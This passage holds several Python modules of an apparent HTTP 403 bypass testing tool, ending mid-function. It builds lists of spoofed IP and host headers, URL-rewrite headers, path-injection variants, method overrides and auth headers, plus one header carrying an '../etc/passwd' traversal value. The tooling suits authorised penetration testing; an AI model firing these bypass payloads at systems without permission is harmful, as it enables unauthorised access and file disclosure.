#!/usr/bin/env python3

import colorama, datetime, enum, json, termcolor, typing

colorama.init(autoreset = True)

class Test(enum.Enum):
	"""
	Enum containing supported tests.
	"""
	PROTOCOLS        = "protocols"
	METHODS          = "methods"
	UPLOADS          = "uploads"
	METHOD_OVERRIDES = "method-overrides"
	SCHEME_OVERRIDES = "scheme-overrides"
	PORT_OVERRIDES   = "port-overrides"
	HOST_OVERRIDES   = "host-overrides"
	PATH_OVERRIDES   = "path-overrides"
	ALL_OVERRIDES    = "overrides"
	HEADERS          = "headers"
	IP_VALUES        = "ip-values"
	HOST_VALUES      = "host-values"
	URL_VALUES       = "url-values"
	ALL_VALUES       = "values"
	PATHS            = "paths"
	PATHS_RAM        = "paths-ram"
	ENCODINGS        = "encodings"
	BASIC_AUTHS      = "basic-auths"
	BEARER_AUTHS     = "bearer-auths"
	ALL_AUTHS        = "auths"
	REDIRECTS        = "redirects"
	PARSERS          = "parsers"
	ALL              = "all"

	# ------------------------------------

	@classmethod
	def all(cls):
		"""
		Get all supported tests.
		"""
		return [
			cls.PROTOCOLS,
			cls.METHODS,
			cls.UPLOADS,
			cls.METHOD_OVERRIDES,
			cls.SCHEME_OVERRIDES,
			cls.PORT_OVERRIDES,
			cls.HOST_OVERRIDES,
			cls.PATH_OVERRIDES,
			cls.HEADERS,
			cls.IP_VALUES,
			cls.HOST_VALUES,
			cls.URL_VALUES,
			cls.PATHS,
			cls.PATHS_RAM,
			cls.ENCODINGS,
			cls.BASIC_AUTHS,
			cls.BEARER_AUTHS,
			cls.REDIRECTS,
			cls.PARSERS
		]

	@classmethod
	def all_lower(cls):
		"""
		Get all supported tests in lowercase.
		"""
		return [entry.value.lower() for entry in cls.all()]

	# ------------------------------------

	@classmethod
	def all_overrides(cls):
		"""
		Get all supported override tests.
		"""
		return [
			cls.METHOD_OVERRIDES,
			cls.SCHEME_OVERRIDES,
			cls.PORT_OVERRIDES,
			cls.HOST_OVERRIDES,
			cls.PATH_OVERRIDES
		]

	# ------------------------------------

	@classmethod
	def all_values(cls):
		"""
		Get all supported user-supplied value tests.
		"""
		return [
			cls.IP_VALUES,
			cls.HOST_VALUES,
			cls.URL_VALUES
		]

	# ------------------------------------

	@classmethod
	def all_auths(cls):
		"""
		Get all supported authentication/authorization tests.
		"""
		return [
			cls.BASIC_AUTHS,
			cls.BEARER_AUTHS
		]

# ----------------------------------------

class ContentLength(enum.Enum):
	"""
	Enum containing supported content lengths.
	"""
	INITIAL = "initial"
	PATH    = "path"

	@classmethod
	def all(cls):
		"""
		Get all supported content lengths.
		"""
		return [
			cls.INITIAL,
			cls.PATH
		]

	@classmethod
	def all_lower(cls):
		"""
		Get all supported content lengths in lowercase.
		"""
		return [entry.value.lower() for entry in cls.all()]

# ----------------------------------------

class UserAgent(enum.Enum):
	"""
	Enum containing supported user agents.
	"""
	RANDOM     = "random"
	RANDOM_ALL = "random-all"

# ----------------------------------------

class StatusCode(enum.Enum):
	"""
	Enum containing supported HTTP response status codes.
	"""
	STATUS_1XX = "1xx"
	STATUS_2XX = "2xx"
	STATUS_3XX = "3xx"
	STATUS_4XX = "4xx"
	STATUS_5XX = "5xx"
	ALL        = "all"

	@classmethod
	def all(cls):
		"""
		Get all supported HTTP response status codes.
		"""
		return [
			cls.STATUS_1XX,
			cls.STATUS_2XX,
			cls.STATUS_3XX,
			cls.STATUS_4XX,
			cls.STATUS_5XX
		]

	@classmethod
	def all_lower(cls):
		"""
		Get all supported HTTP response status codes in lowercase.
		"""
		return [entry.value.lower() for entry in cls.all()]

	@classmethod
	def get_color_name(cls, status_code: int) -> str:
		"""
		Get the color based on the specified HTTP response status code.
		"""
		if status_code < 100 or status_code >= 600:
			return colorama.Fore.WHITE
		elif status_code >= 500:
			return colorama.Fore.BLUE
		elif status_code >= 400:
			return colorama.Fore.RED
		elif status_code >= 300:
			return colorama.Fore.YELLOW
		elif status_code >= 200:
			return colorama.Fore.GREEN
		elif status_code >= 100:
			return colorama.Fore.WHITE

	@classmethod
	def from_status_code(cls, status_code: int) -> "StatusCode":
		"""
		Get the enum based on the specified HTTP response status code.
		"""
		if status_code < 100 or status_code >= 600:
			return None
		elif status_code >= 500:
			return cls.STATUS_5XX
		elif status_code >= 400:
			return cls.STATUS_4XX
		elif status_code >= 300:
			return cls.STATUS_3XX
		elif status_code >= 200:
			return cls.STATUS_2XX
		elif status_code >= 100:
			return cls.STATUS_1XX

# ----------------------------------------

class ErrorCode(enum.Enum):
	"""
	Enum containing custom error HTTP response status codes.
	"""
	IGNORED   = -2
	ERROR     = -1
	UNTESTED  =  0

	@classmethod
	def all(cls):
		"""
		Get all custom error HTTP response status code values.
		"""
		return [
			cls.IGNORED.value,
			cls.ERROR.value,
			cls.UNTESTED.value
		]

	@classmethod
	def get_error_name(cls, status_code: int):
		"""
		Get the error name based on the specified HTTP response status code.
		"""
		if status_code in cls.all():
			return ErrorCode(status_code).name
		else:
			return str(status_code)

# ----------------------------------------

class Engine(str, enum.Enum):
	"""
	Enum containing HTTP request engines.
	"""
	PYTHON_REQUESTS = "python_requests"
	PYCURL          = "pycurl"
	HTTP_CLIENT     = "http_client"

	def get_title(self):
		"""
		Get the title to show.
		"""
		mapping = {
			Engine.PYTHON_REQUESTS: "Python Requests",
			Engine.PYCURL         : "PycURL",
			Engine.HTTP_CLIENT    : "HTTP Client"
		}
		return mapping[self]

	def get_method(self):
		"""
		Get the method name to call.
		"""
		mapping = {
			Engine.PYTHON_REQUESTS: "_Forbidden__send_python_requests",
			Engine.PYCURL         : "_Forbidden__send_pycurl",
			Engine.HTTP_CLIENT    : "_Forbidden__send_http_client"
		}
		return mapping[self]

# ----------------------------------------

class UniqueString(str):
	"""
	Class that allows us to use duplicate keys in a dictionary.
	"""

	__lower = None

	def __hash__(self):
		return id(self)

	def __eq__(self, other):
		return self is other

	def lower(self):
		if self.__lower is None:
			lower = str.lower(self)
			if str.__eq__(lower, self):
				self.__lower = self
			else:
				self.__lower = UniqueString(lower)
		return self.__lower

# ----------------------------------------

def get_timestamp(message: str):
	"""
	Get the current timestamp.
	"""
	return f"{datetime.datetime.now().strftime('%H:%M:%S')} - {message}"

def color(value: typing.Any, color_name: str):
	"""
	Color a value.
	"""
	return f"{color_name}{value}{colorama.Style.RESET_ALL}"

def color_multiple(values: list[typing.Any], color_name: str):
	"""
	Color multiple values.
	"""
	tmp = []
	for value in values:
		tmp.append(color(value, color_name))
	return tuple(tmp)

def print_error(message: str):
	"""
	Print an error message.
	"""
	print(f"ERROR: {message}")

def print_green(message: str):
	"""
	Print a message in green color.
	"""
	termcolor.cprint(message, "green")

def print_yellow(message: str):
	"""
	Print a message in yellow color.
	"""
	termcolor.cprint(message, "yellow")

def print_red(message: str):
	"""
	Print a message in red color.
	"""
	termcolor.cprint(message, "red")

def print_cyan(message: str):
	"""
	Print a message in cyan color.
	"""
	termcolor.cprint(message, "cyan")

def jdump(data: typing.Any):
	"""
	Serialize a data to a JSON string.
	"""
	return json.dumps(data, indent = 4, ensure_ascii = False)



#!/usr/bin/env python3

import regex as re

__FLAGS = re.MULTILINE | re.IGNORECASE

def validate(query: str):
	"""
	Validate a regular expression.
	"""
	success = False
	message = ""
	try:
		re.compile(query)
		success = True
	except re.error:
		message = f"Invalid RegEx: {query}"
	return success, message

def find(string: str, query: str):
	"""
	Extract all matches from a string using the specified RegEx pattern.
	"""
	return re.findall(query, string, flags = __FLAGS)

def search(string: str, query: str):
	"""
	Check if there are any matches in a string using the specified RegEx pattern.
	"""
	return bool(re.search(query, string, flags = __FLAGS))

def replace(string: str, query: str, new = ""):
	"""
	Replace all matches in a string using the specified RegEx pattern with a new value.
	"""
	return re.sub(query, new, string, flags = __FLAGS)



#!/usr/bin/env python3

from . import array, grep, path, url

import base64, json, jwt as pyjwt, typing

__ENCODING  = "UTF-8"
__DECODINGS = ["ISO-8859-1", "UTF-8"]

def encode(string: str):
	"""
	Encode a string.
	"""
	return string.encode(__ENCODING)

def encode_multiple(strings: list[str]):
	"""
	Encode multiple strings.
	"""
	return [encode(string) for string in strings]

def decode(bytes: bytes):
	"""
	Decode bytes.\n
	Returns an empty string and an error message on failure.
	"""
	string = ""
	message = ""
	for encoding in __DECODINGS:
		try:
			string = bytes.decode(encoding)
			message = ""
			break
		except UnicodeDecodeError as ex:
			message = str(ex)
	return string, message

# ----------------------------------------

def to_hex(string: str):
	"""
	Hexadecimal encode all alphanumeric characters a string.
	"""
	tmp = ""
	for character in string:
		if character.isalnum():
			character = f"%{format(ord(character), 'x')}"
		tmp += character
	return tmp

def to_unicode(string: str, case_sensitive = False):
	"""
	Replace each alphanumeric characters in a string with its corresponding Unicode modifier.\n
	Not all alphanumeric characters are supported.
	"""
	modifiers = {
		"a": "\u1d2c",
		"b": "\u1d2e",
		"d": "\u1d30",
		"e": "\u1d31",
		"g": "\u1d33",
		"h": "\u1d34",
		"i": "\u1d35",
		"j": "\u1d36",
		"k": "\u1d37",
		"l": "\u1d38",
		"m": "\u1d39",
		"n": "\u1d3a",
		"o": "\u1d3c",
		"p": "\u1d3e",
		"r": "\u1d3f",
		"t": "\u1d40",
		"u": "\u1d41",
		"w": "\u1d42",
		"1": "\u2460",
		"2": "\u2461",
		"3": "\u2462",
		"4": "\u2463",
		"5": "\u2464",
		"6": "\u2465",
		"7": "\u2466",
		"8": "\u2467",
		"9": "\u2468"
	}
	if case_sensitive:
		for old, new in modifiers.items():
			if old in string:
				string = string.replace(old, new)
	else:
		lower = string.lower()
		for old, new in modifiers.items():
			if old in lower:
				string = grep.replace(string, old, new)
	return string

# ----------------------------------------

def toggle(string: str):
	"""
	Change the case of alphabetical characters in a string, alternating between uppercase and lowercase.
	"""
	tmp = ""
	upper = False
	for character in string:
		if character.isalpha():
			upper = character.isupper()
			break
	for character in string:
		if character.isalpha():
			character = character.lower() if upper else character.upper()
			upper = not upper
		tmp += character
	return tmp

def capitalize(string: str):
	"""
	Capitalize a string starting from the first alphabetical character.
	"""
	tmp = ""
	changed = False
	for character in string.lower():
		if not changed and character.isalpha():
			character = character.upper()
			changed = True
		tmp += character
	return tmp

# ----------------------------------------

def transform_host(host: str):
	"""
	Get a list of transformed and encoded URL hosts, including the initial one.\n
	Returns a unique list.
	"""
	tmp = [host, host.lower(), host.upper(), toggle(host), capitalize(host), url.quote(to_unicode(host))]
	tmp = tmp + [to_hex(entry) for entry in tmp[:-1]]
	return array.unique(tmp)

def transform_path(path_no_parameters: str):
	"""
	Get a list of transformed and encoded relative URL paths, including the initial one.\n
	Returns a unique list.
	"""
	tmp = []
	directory = path_no_parameters.strip(path.SEP)
	if not directory:
		tmp = [path_no_parameters]
	else:
		directory = directory.rsplit(path.SEP, 1)
		last      = directory[-1]
		tmp       = [last, last.lower(), last.upper(), toggle(last), capitalize(last), url.quote(to_unicode(last))]
		tmp       = tmp + [to_hex(entry) for entry in tmp[:-1]]
		prepend   = path.SEP if len(directory) < 2 else path.SEP + directory[0] + path.SEP
		append    = path.SEP if path_no_parameters.endswith(path.SEP) else ""
		tmp       = [prepend + entry + append for entry in tmp]
	return array.unique(tmp)

# ----------------------------------------

def b64(string: str):
	"""
	Base64 encode a string.
	"""
	return base64.b64encode((string).encode(__ENCODING)).decode(__ENCODING)

def b64_credentials(username: str, password: str):
	"""
	Base64 encode credentials as used in basic authentication/authorization.
	"""
	return b64(f"{username}:{password}")

def b64_payload(payload: dict[str, typing.Any]):
	"""
	Base64 encode a payload as used in JWTs.
	"""
	return b64(json.dumps(payload, separators = (",", ":"))).rstrip("=")

def jwt(alg: str, key: str, payload: dict[str, typing.Any] = None, headers: dict[str, typing.Any] = None):
	"""
	JWT encode.
	"""
	return pyjwt.encode(payload or {}, key, alg, headers or {})



#!/usr/bin/env python3

from .utils import config, file, general, stresser, validate

import datetime

# ----------------------------------------

class Stopwatch:

	def __init__(self):
		self.__start = datetime.datetime.now()

	def stop(self):
		self.__end = datetime.datetime.now()
		print(f"Script has finished in {self.__end - self.__start}")

stopwatch = Stopwatch()

# ----------------------------------------

def main():
	success, args = validate.Validate().validate_args()
	if success:
		config.banner()
		tool = stresser.Stresser(
			args.url,
			args.ignore_parameters,
			args.ignore_requests,
			args.force,
			args.header,
			args.cookie,
			args.ignore,
			args.content_lengths,
			args.request_timeout,
			args.repeat,
			args.user_agent,
			args.proxy,
			args.status_codes,
			args.directory,
			args.debug
		)
		results = tool.run(args.threads, args.show_table, args.dump)
		stopwatch.stop()
		if results and args.out:
			file.overwrite(general.jdump(results), args.out)

if __name__ == "__main__":
	main()



#!/usr/bin/env python3

from . import grep

SEP = "/"

def replace_multiple_slashes(path_no_parameters: str):
	"""
	Replace multiple consecutive forward slashes with a single forward slash.\n
	For example, replace '//' with '/', etc.
	"""
	return grep.replace(path_no_parameters, r"\/{2,}", SEP)



#!/usr/bin/env python3

import socket

def get(fqdn: str):
	"""
	Get the IPv4 address for the specified FQDN.\n
	Returns an empty string on failure.
	"""
	ip = ""
	try:
		if fqdn:
			ip = socket.gethostbyname(fqdn)
	except socket.error:
		pass
	return ip



#!/usr/bin/env python3

from . import record

import os

def write_result_silent(record: record.Records.Record, directory = ""):
	"""
	Silently write a result to an output file.
	"""
	try:
		file = os.path.join(directory, f"{record.id}.txt")
		if not os.path.exists(file):
			open(file, "w").write(record.response)
	except Exception:
		pass

def overwrite(text: str, out: str):
	"""
	Write a text to an output file.\n
	If the output file exists, prompt to overwrite it.
	"""
	confirm = "yes"
	if os.path.isfile(out):
		print(f"'{out}' already exists")
		confirm = input("Overwrite the output file (yes): ")
	if confirm.lower() in ["yes", "y"]:
		try:
			open(out, "w").write(text)
			print(f"Results have been saved to '{out}'")
		except FileNotFoundError:
			print(f"Cannot save the results to '{out}'")



#!/usr/bin/env python3

from . import general, record

import tabulate, typing

class Report:

	def __init__(self, collection: record.Records, status_codes: list[general.StatusCode]):
		"""
		Class for storing and managing the results.
		"""
		self.__valid        = sorted(collection.get_valid(), key = lambda record: (record.status, -record.length, record.id_int))
		self.__statistics   = self.__get_statistics(collection.get())
		self.__status_codes = status_codes

	# ------------------------------------

	def __show_json(self) -> list[dict[str, typing.Any]]:
		"""
		Show the test records in a JSON format and return them as a JSON-compatible list.
		"""
		tmp = []
		for record in self.__valid:
			if general.StatusCode.from_status_code(record.status) in self.__status_codes:
				result = record.to_result()
				print(general.color(general.jdump(result), general.StatusCode.get_color_name(record.status)))
				tmp.append(result)
		return tmp

	def __show_table(self) -> list[dict[str, typing.Any]]:
		"""
		Show the test records in a table format and return them as a JSON-compatible list.
		"""
		tmp = []
		table = []
		for record in self.__valid:
			if general.StatusCode.from_status_code(record.status) in self.__status_codes:
				tmp.append(record.to_result())
				table.append(general.color_multiple([getattr(record, attr) for attr in ["id", "status", "length", "command"]], general.StatusCode.get_color_name(record.status)))
		if table:
			print(tabulate.tabulate(table, tablefmt = "plain", colalign = ("right", "right", "right", "left")))
		return tmp

	def show(self, show_table = False):
		"""
		Show the test records in a JSON or table format and return them as a JSON-compatible list.
		"""
		return self.__show_table() if show_table else self.__show_json()

	# ------------------------------------

	def __get_statistics(self, records: list[record.Records.Record]) -> dict[int, int]:
		"""
		Get HTTP response status code statistics.
		"""
		tmp = {}
		for record in records:
			tmp[record.status] = tmp.get(record.status, 0) + 1

		def __sort_by_status_code(status_code: int):
			if status_code in general.ErrorCode.all():
				return (1, status_code)
			else:
				return (0, status_code)

		return dict(sorted(tmp.items(), key = lambda status_code: __sort_by_status_code(status_code[0])))

	def show_statistics(self):
		"""
		Show the HTTP response status code statistics in a table format.
		"""
		table = []
		for code, count in self.__statistics.items():
			table.append(general.color_multiple([general.ErrorCode.get_error_name(code), count], general.StatusCode.get_color_name(code)))
		if table:
			print(tabulate.tabulate(table, ["Status Code", "Count"], tablefmt = "outline", colalign = ("left", "right")))



#!/usr/bin/env python3

from .       import array, encode, path, url
from .cookie import format_key_value as format_cookie
from .header import format_key_value as format_header

import copy

# ----------------------------------------

def get_file_upload_urls(inaccessible_url: url.URL, filename: str):
	"""
	Get a list of file upload URLs recursively for each directory in the URL path with and without the specified filename.\n
	Returns a unique list.
	"""
	tmp = []
	for url in path.join_multiple(inaccessible_url.domain.scheme_domain_port, path.get_recursive(inaccessible_url.path.path_no_parameters)):
		for __url in [path.join(url, filename), url]:
			tmp.append(__url + inaccessible_url.query_string.string + inaccessible_url.fragment.string)
	return array.unique(tmp)

# ----------------------------------------

def get_method_override_urls(inaccessible_url: url.URL, methods: list[str]):
	"""
	Get a list of method override URLs.\n
	Returns a unique list.
	"""
	tmp = []
	parameters = [
		"_method",
		"x-http-method-override",
		"x-method-override",
		"X-HTTP-Method-Override",
		"X-Method-Override"
	]
	for parameter in parameters:
		copied = copy.deepcopy(inaccessible_url)
		for method in methods:
			if parameter in copied.query_string.parsed:
				copied.query_string.parsed[parameter][-1] = method
			else:
				copied.query_string.parsed[parameter] = [method]
			tmp.append(copied.domain.scheme_domain_port + copied.path.path_no_parameters + f"?{url.urlencode(copied.query_string.parsed)}" + copied.fragment.string)
	return array.unique(tmp)

def get_method_override_headers(methods: list[str]):
	"""
	Get a list of method override HTTP request headers.\n
	Returns a unique list.
	"""
	tmp = []
	headers = [
		"X-HTTP-Method",
		"X-HTTP-Method-Override",
		"X-Method",
		"X-Method-Override"
	]
	for header in headers:
		for method in methods:
			tmp.append(format_header(header, method))
	return array.unique(tmp)

def get_method_override_bodies(methods: list[str]):
	"""
	Get a list of method override HTTP request bodies in the 'key=value' format.\n
	For example, use the bodies with the HTTP POST method and the 'Content-Type: application/x-www-form-urlencoded' HTTP request header.\n
	Returns a unique list.
	"""
	tmp = []
	parameters = [
		"_method"
	]
	for parameter in parameters:
		for method in methods:
			tmp.append(format_cookie(parameter, method))
	return array.unique(tmp)

# ----------------------------------------

def get_scheme_override_headers(scheme: url.Scheme):
	"""
	Get a list of scheme override HTTP request headers.\n
	Returns a unique list.
	"""
	tmp = []
	# ------------------------------------
	headers = [
		"X-Forwarded-Protocol",
		"X-Forwarded-Proto",
		"X-Forwarded-Scheme",
		"X-URL-Scheme",
		"X-Scheme"
	]
	for header in headers:
		tmp.append(format_header(header, scheme.value))
	# ------------------------------------
	headers = [
		"X-Forwarded-SSL",
		"Front-End-HTTPS"
	]
	for header in headers:
		tmp.append(format_header(header, url.Scheme.get_ssl_status(scheme.value)))
	# ------------------------------------
	return array.unique(tmp)

# ----------------------------------------

def get_port_override_headers(ports: list[int]):
	"""
	Get a list of port override HTTP request headers.\n
	Returns a unique list.
	"""
	tmp = []
	headers = [
		"X-Forwarded-Port"
	]
	for header in headers:
		for port in ports:
			tmp.append(format_header(header, port))
	return array.unique(tmp)

# ----------------------------------------

def get_host_override_headers(hosts: list[str]):
	"""
	Get a list of host override HTTP request headers.\n
	Returns a unique list.
	"""
	tmp = []
	headers = [
		"X-Forwarded-Host",
		"X-HTTP-Host-Override",
		"X-Host-Override",
		"X-Host",
		"Host"
	]
	for header in headers:
		for host in hosts:
			tmp.append(format_header(header, host))
	return array.unique(tmp)

def get_two_host_headers(inaccessible_url: url.URL, evil_url: url.URL) -> list[list[str]]:
	"""
	Get a list of HTTP request headers where each element contains two 'Host' HTTP request headers.\n
	Returns a unique list.
	"""
	tmp = []
	for evil in evil_url.domain.domains + evil_url.ip.ips:
		for initial in inaccessible_url.domain.domains + inaccessible_url.ip.ips:
			tmp.append([
				f"Host: {initial}",
				f"Host: {evil}"
			])
	return tmp

# ----------------------------------------

def get_path_override_headers(paths: list[str]):
	"""
	Get a list of URL path override HTTP request headers.\n
	Returns a unique list.
	"""
	tmp = []
	headers = [
		"X-Forwarded-Path",
		"X-Original-URL",
		"X-Override-URL",
		"X-Rewrite-URL"
	]
	for header in headers:
		for path in paths:
			tmp.append(format_header(header, path))
	return array.unique(tmp)

# ----------------------------------------

def get_ip_headers(ips: list[str]):
	"""
	Get a list of HTTP request headers that accept IP addresses.\n
	Returns a unique list.
	"""
	tmp = []
	# ------------------------------------
	headers = [
		"CF-Connecting-IP",
		"X-Originating-IP",
		"X-ProxyUser-IP",
		"X-Real-IP",
		"X-Remote-IP",
		"X-Server-IP",
		"X-True-IP",
		"Client-IP",
		"X-Client-IP",
		"Cluster-Client-IP",
		"X-Cluster-Client-IP",
		"True-Client-IP",
		"X-True-Client-IP",
		"Proxy-Client-IP",
		"WL-Proxy-Client-IP",
		"Incap-Client-IP",
		"X-Forward",
		"X-Forward-For",
		"X-Forwarded",
		"X-Forwarded-By",
		"Forwarded-For",
		"X-Forwarded-For",
		"Forwarded-For-IP",
		"X-Forwarded-For-IP",
		"X-Forwarded-For-Original",
		"X-Original-Forwarded-For",
		"X-Originally-Forwarded-For",
		"Remote-Addr",
		"X-Remote-Addr",
		"X-Original-Remote-Addr"
	]
	for header in headers:
		for ip in ips:
			tmp.append(format_header(header, ip))
	# ------------------------------------
	for ip in ips:
		for __ip in [ip, f"for={ip}", f"by={ip}"]:
			tmp.append(format_header("Forwarded", __ip))
	# ------------------------------------
	for ip in ips:
		for injection in ["", ";", ".;", "..;"]:
			tmp.append(format_header("X-Custom-IP-Authorization", ip + injection))
	# ------------------------------------
	return array.unique(tmp)

def get_multi_ip_headers(ips: list[str]):
	"""
	Get a list of HTTP request headers that accept comma-separated IP addresses.\n
	Returns a unique list.
	"""
	tmp = []
	headers = [
		"X-Forward",
		"X-Forward-For",
		"Forwarded",
		"X-Forwarded",
		"X-Forwarded-By",
		"Forwarded-For",
		"X-Forwarded-For",
		"Forwarded-For-IP",
		"X-Forwarded-For-IP",
		"X-Forwarded-For-Original",
		"X-Original-Forwarded-For",
		"X-Originally-Forwarded-For"
	]
	for header in headers:
		for ip in ips:
			tmp.append(format_header(header, ip))
	return array.unique(tmp)

def get_host_headers(hosts: list[str]):
	"""
	Get a list of HTTP request headers that accept IP addresses and domain names.\n
	Returns a unique list.
	"""
	tmp = []
	headers = [
		"X-Forwarded-Server",
		"X-Proxy-Host",
		"Proxy",
		"Redirect"
	]
	for header in headers:
		for host in hosts:
			tmp.append(format_header(header, host))
	return array.unique(tmp)

def get_root_url_headers(urls: list[str]):
	"""
	Get a list of HTTP request headers that accept root URLs.\n
	Returns a unique list.
	"""
	tmp = []
	headers = [
		"X-Referer",
		"Referer",
		"Origin"
	]
	for header in headers:
		for url in urls:
			tmp.append(format_header(header, url))
	return array.unique(tmp)

def get_full_url_headers(urls: list[str]):
	"""
	Get a list of HTTP request headers that accept full URLs.\n
	Returns a unique list.
	"""
	tmp = []
	headers = [
		"X-Referer",
		"Referer",
		"X-Proxy-URL",
		"Proxy",
		"X-HTTP-DestinationURL",
		"Destination",
		"Redirect",
		"Request-URI",
		"URI",
		"Base-URL",
		"URL",
		"X-WAP-Profile",
		"WAP-Profile",
		"19-Profile",
		"Profile"
	]
	for header in headers:
		for url in urls:
			tmp.append(format_header(header, url))
	return array.unique(tmp)

def get_special_headers(inaccessible_url: url.URL, evil_url: url.URL):
	"""
	Get a list of HTTP request headers that accept special values.\n
	Returns a unique list.
	"""
	tmp = [
		format_header("X-Requested-With", "XMLHttpRequest"                                  ),
		format_header("X-WAP-Profile"   , "http://wap.samsungmobile.com/uaprof/SGH-I777.xml"),
		format_header("WAP-Profile"     , "http://wap.samsungmobile.com/uaprof/SGH-I777.xml"),
		format_header("19-Profile"      , "http://wap.samsungmobile.com/uaprof/SGH-I777.xml"),
		format_header("Accept"          , "application/json,text/javascript,*/*;q=0.01"     ),
		format_header("Accept"          , "../../../../../../../../../../etc/passwd{{"      )
	]
	# ------------------------------------
	for url in [inaccessible_url, evil_url]:
		for root_url in url.domain.scheme_domains:
			tmp.append(format_header("Profile", f"<{root_url}{url.path.path_no_parameters}>"))
		if not url.is_ip():
			tmp.append(format_header("From", f"root@{url.domain.domain}"))
	# ------------------------------------
	return array.unique(tmp)

# ----------------------------------------

def get_path_bypass_urls(inaccessible_url: url.URL, battering_ram = False):
	"""
	Get a list of path bypass URLs.\n
	Returns a unique list.
	"""
	bypasses = []
	directory = inaccessible_url.path.path_no_parameters.strip(path.SEP)
	# ------------------------------------
	# NOTE: Inject characters at the beginning, at the end, and at both the beginning and the end of the URL path.
	# NOTE: Test using every possible combination of the payload set (default: cluster bomb) or insert the same payload into all defined payload positions simultaneously (battering ram).
	injections = []
	for injection in ["", "%09", "%20", "%23", "%2e", "%a0", "*", ".", "..", ";", ".;", "..;", ";foo=bar;", "/;/", ";/../../"]:
		injections.extend([path.SEP + injection + path.SEP, path.SEP + injection, injection + path.SEP, injection])
	# -- -- -- -- -- -- -- -- -- -- -- ---
	for injection in injections:
		bypasses.extend([injection + directory, directory + injection])
		if directory:
			if battering_ram:
				bypasses.extend([injection + directory + injection])
			else:
				for __injection in injections:
					bypasses.extend([injection + directory + __injection])
	# ------------------------------------
	# NOTE: Inject characters at the beginning of the URL path.
	injections = ["/notfound/../"]
	# -- -- -- -- -- -- -- -- -- -- -- ---
	for injection in injections:
		bypasses.extend([injection + directory])
	# ------------------------------------
	# NOTE: Inject characters at the end of the URL path.
	injections = ["[.].*"]
	# -- -- -- -- -- -- -- -- -- -- -- ---
	for injection in injections:
		bypasses.extend([directory + injection])
	# ------------------------------------
	# NOTE: Inject characters at the end of the URL path.
	injections = []
	for injection in ["#", "*", ".", "?", "~"]:
		injections.extend([injection, injection + injection, f"{injection}random"])
	# -- -- -- -- -- -- -- -- -- -- -- ---
	for injection in injections:
		bypasses.extend([directory + injection, directory + path.SEP + injection])
	# ------------------------------------
	# NOTE: Inject file extensions at the end of the URL path only if it does not end with a forward slash.
	if directory and not inaccessible_url.path.path_no_parameters.endswith(path.SEP):
		injections = ["asp", "aspx", "esp", "html", "jhtml", "json", "jsp", "jspa", "jspx", "php", "sht", "shtml", "xhtml", "xml"]
		# -- -- -- -- -- -- -- -- -- -- --
		for injection in injections:
			bypasses.extend([f"{directory}.{injection}"])
	# ------------------------------------
	tmp = []
	for bypass in bypasses:
		if bypass:
			tmp.append(inaccessible_url.domain.scheme_domain_port + path.prepend_slash(bypass) + inaccessible_url.query_string.string + inaccessible_url.fragment.string)
	# ------------------------------------
	return array.unique(tmp)

# ----------------------------------------

def get_encoded_urls(inaccessible_url: url.URL):
	"""
	Get a list of transformed and encoded URLs.\n
	Returns a unique list.
	"""
	tmp = []
	hosts = encode.transform_host(inaccessible_url.domain.domain)
	paths = encode.transform_path(inaccessible_url.path.path_no_parameters) if inaccessible_url.path.path_no_parameters else []
	for host in hosts:
		tmp.append(f"{inaccessible_url.scheme}://{host}:{inaccessible_url.port}{inaccessible_url.path.path}")
		for path in paths:
			tmp.append(f"{inaccessible_url.scheme}://{host}:{inaccessible_url.port}{path}{inaccessible_url.query_string.string}{inaccessible_url.fragment.string}")
	return array.unique(tmp)

# ----------------------------------------

def get_basic_auth_headers(credentials: list[str]):
	"""
	Get a list of basic authorization HTTP request headers.\n
	Returns a unique list.
	"""
	tmp = []
	headers = [
		"Authorization"
	]
	for header in headers:
		for credential in credentials:
			tmp.append(format_header(header, f"Basic {credential}"))
	return array.unique(tmp)

# ----------------------------------------

def get_bearer_auth_headers(jwts: list[str]):
	"""
	Get a list of bearer authorization HTTP request headers.\n
	Returns a unique list.
	"""
	tmp = []
	headers = [
		"Authorization"
	]
	for header in headers:
		for jwt in jwts:
			tmp.append(format_header(header, f"Bearer {jwt}"))
	return array.unique(tmp)



#!/usr/bin/env python3

from . import general, grep

import typing

__QUOTE = "'"
"""
Quotes used in 'record.command', i.e., in a cURL command.
"""

def set_opt(value: typing.Any, opt = ""):
	"""
	Enclose a value in quotes, escape the inner quotes, and append it to an option - if specified.
	"""
	tmp = __QUOTE + str(value).replace(__QUOTE, f"\\{__QUOTE}") + __QUOTE
	if opt:
		tmp = f"{opt} {tmp}"
	return tmp

# ----------------------------------------

class Records:

	id = 0

	def __init__(self):
		"""
		Class for storing test records.
		"""
		self.__records: list[Records.Record] = []

	def get(self):
		"""
		Get all test records.
		"""
		return self.__records

	def get_valid(self):
		"""
		Get only valid test records.
		"""
		return [record for record in self.__records if record.is_valid()]

	def get_tests(self):
		"""
		Get all test records as a JSON-compatible list.
		"""
		return [record.to_test() for record in self.__records]

	def append(self, record: "Records.Record"):
		"""
		Append a test record to the records.
		"""
		self.__records.append(record)

	def len(self):
		"""
		Get the total number of test records.
		"""
		return len(self.__records)

	def unique(self):
		"""
		Remove duplicate test records.\n
		Duplicates are filtered based on 'record.command'.
		"""
		tmp = []
		exists = set()
		for record in self.__records:
			command = grep.replace(record.command, set_opt(".+?", "-A")) # NOTE: Ignoring user agents as they could all be random / unique.
			if command not in exists and not exists.add(command):
				tmp.append(record)
		self.__records = tmp

	class Record:

		def __init__(
			self,
			id        : str,
			url       : str,
			method    : str,
			headers   : list[str],
			cookies   : list[str],
			body      : str,
			user_agent: str,
			proxy     : str,
			engine    : general.Engine
		):
			"""
			Class for storing test details.
			"""
			Records.id += 1
			self.id_int          : int                  = Records.id
			self.id              : str                  = f"{self.id_int}-{id}"
			self.url             : str                  = url
			self.method          : str                  = method
			self.headers         : list[str]            = headers
			self.cookies         : list[str]            = cookies
			self.body            : str                  = body
			self.user_agent      : str                  = user_agent
			self.proxy           : str                  = proxy
			self.engine          : general.Engine       = engine
			self.command         : str                  = self.__build_command()
			self.status          : int                  = general.ErrorCode.UNTESTED.value
			self.length          : int                  = 0
			self.response        : str                  = ""
			self.response_headers: str | dict[str, str] = "" if engine in [general.Engine.PYCURL] else {}
			self.error           : str                  = ""

		def is_valid(self):
			"""
			Check if the HTTP response status code is valid.
			"""
			return bool(general.StatusCode.from_status_code(self.status))

		def to_result(self):
			"""
			Serialize the test record to a JSON-compatible dictionary, excluding certain attributes.
			"""
			return self.__remove(["id_int", "proxy", "engine", "response", "response_headers", "error"])

		def to_test(self):
			"""
